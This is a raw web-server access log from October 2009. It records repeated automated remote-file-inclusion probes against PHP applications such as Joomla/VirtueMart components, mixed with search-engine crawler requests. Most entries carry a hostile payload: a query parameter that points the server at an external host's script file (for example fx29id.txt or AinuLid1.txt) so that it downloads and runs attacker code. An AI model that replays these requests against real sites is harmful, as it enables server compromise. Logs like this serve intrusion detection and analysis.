211.206.120.162 - - [16/Oct/2009:02:06:31 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:31 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:31 -0500] "GET /logs/access_log.1243641600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:31 -0500] "GET /logs/access_log.1240185600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.106.204 - - [16/Oct/2009:02:06:32 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.162 - - [16/Oct/2009:02:06:44 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:44 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:44 -0500] "GET /logs/access_log.1244851200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:50 -0500] "GET /logs/access_log.1241481600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:59 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:59 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:06:59 -0500] "GET /logs/access_log.1244851200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:07:06 -0500] "GET /logs/access_log.1241481600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.207.29 - - [16/Oct/2009:02:09:01 -0500] "GET /logs/access_log.1141430400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.135.218.37 - - [16/Oct/2009:02:16:27 -0500] "GET //galeria.php?start=0&kategoria=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
200.135.218.37 - - [16/Oct/2009:02:16:27 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.135.218.37 - - [16/Oct/2009:02:16:27 -0500] "GET /logs/access_log.1250985600//galeria.php?start=0&kategoria=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.135.218.37 - - [16/Oct/2009:02:16:27 -0500] "GET /logs/access_log.1250121600//galeria.php?start=0&kategoria=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:16:50 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:16:50 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:16:50 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:17:24 -0500] "GET /logs/access_log.1252540800//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:17:24 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:17:24 -0500] "GET /logs/access_log.1252627200//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:17:24 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.207.28 - - [16/Oct/2009:02:20:01 -0500] "GET /logs/access_log.1190678400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.135.218.37 - - [16/Oct/2009:02:23:23 -0500] "GET /logs/access_log.1249603200//galeria.php?start=0&kategoria=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:02:26:26 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:02:26:26 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:02:26:30 -0500] "GET /logs/access_log.1245369600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:02:26:30 -0500] "GET /logs/access_log.1245888000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.51.69 - - [16/Oct/2009:02:28:48 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.193.15.3 - - [16/Oct/2009:02:29:33 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:02:29:36 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.111.176.104 - - [16/Oct/2009:02:29:51 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kanghs.com/tmp/tmp/id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.111.176.104 - - [16/Oct/2009:02:29:51 -0500] "GET /logs/access_log.1252540800//admin/business_inc/saveserver.php?thisdir=http://www.kanghs.com/tmp/tmp/id.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.111.176.104 - - [16/Oct/2009:02:29:51 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kanghs.com/tmp/tmp/id.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.55.51.69 - - [16/Oct/2009:02:30:11 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.125.237.35 - - [16/Oct/2009:02:32:05 -0500] "GET /logs/access_log.1249948800//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:32:05 -0500] "GET /logs/access_log.1250467200//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:32:05 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:02:32:08 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:35:23 -0500] "GET //modules/xfsection/modify.php?dir_module=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:35:23 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:35:23 -0500] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:02:37:26 -0500] "GET //japanese.php?u=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:02:37:26 -0500] "GET /logs/access_log.1252368000//japanese.php?u=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:02:37:26 -0500] "GET /logs//japanese.php?u=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:38:24 -0500] "GET /logs/access_log.1250035200/home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:38:24 -0500] "GET /logs/home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:38:24 -0500] "GET /home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:42:37 -0500] "GET /index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:42:37 -0500] "GET /logs/access_log.1249948800/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:42:37 -0500] "GET /logs/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:42:37 -0500] "GET /logs/access_log.1249776000/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:23 -0500] "GET /logs/access_log.1248480000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:39 -0500] "GET /logs/access_log.1247875200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:39 -0500] "GET /logs/access_log.1230249600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:39 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:42 -0500] "GET /logs/access_log.1241654400///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:43 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 167825 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:52 -0500] "GET /logs/access_log.1230249600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:52 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:47:52 -0500] "GET /logs/access_log.1247875200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:01 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:01 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:01 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:01 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:03 -0500] "GET /logs/access_log.1241136000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:03 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:11 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:11 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:12 -0500] "GET /logs/access_log.1241136000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:13 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:22 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:22 -0500] "GET /logs/access_log.1241136000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:25 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:25 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 102257 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:25 -0500] "GET /logs/access_log.1237680000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:26 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:27 -0500] "GET /logs/access_log.1241136000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:42 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:43 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:44 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:45 -0500] "GET /logs/access_log.1248480000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:45 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:54 -0500] "GET /logs/access_log.1237680000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:48:54 -0500] "GET /logs/access_log.1237420800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:49:22 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:49:33 -0500] "GET /logs/access_log.1241654400///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:51:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:51:43 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:51:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:52:22 -0500] "GET /logs/home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:52:22 -0500] "GET /logs/access_log.1250035200/home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:52:22 -0500] "GET /home.php?content=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:52:46 -0500] "GET /logs/access_log.1249862400///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:52:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:52:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:52:46 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:53:06 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:54:12 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET /logs/access_log.1228608000//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
72.11.145.8 - - [16/Oct/2009:02:54:15 -0500] "GET /logs/access_log.1237680000///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET /logs/access_log.1228608000//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:15 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
125.251.147.194 - - [16/Oct/2009:02:54:21 -0500] "GET /index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:54:21 -0500] "GET /logs/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:54:21 -0500] "GET /logs/access_log.1249948800/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.251.147.194 - - [16/Oct/2009:02:54:21 -0500] "GET /logs/access_log.1249776000/index0.php?show=http://88.27.253.185:8080/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:54:24 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:24 -0500] "GET /logs/access_log.1228608000//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:24 -0500] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
210.125.146.91 - - [16/Oct/2009:02:54:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:54:38 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.125.146.91 - - [16/Oct/2009:02:54:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:02:54:41 -0500] "GET /logs/access_log.1237420800///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:54:42 -0500] "GET /logs/access_log.1228608000//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:54:42 -0500] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
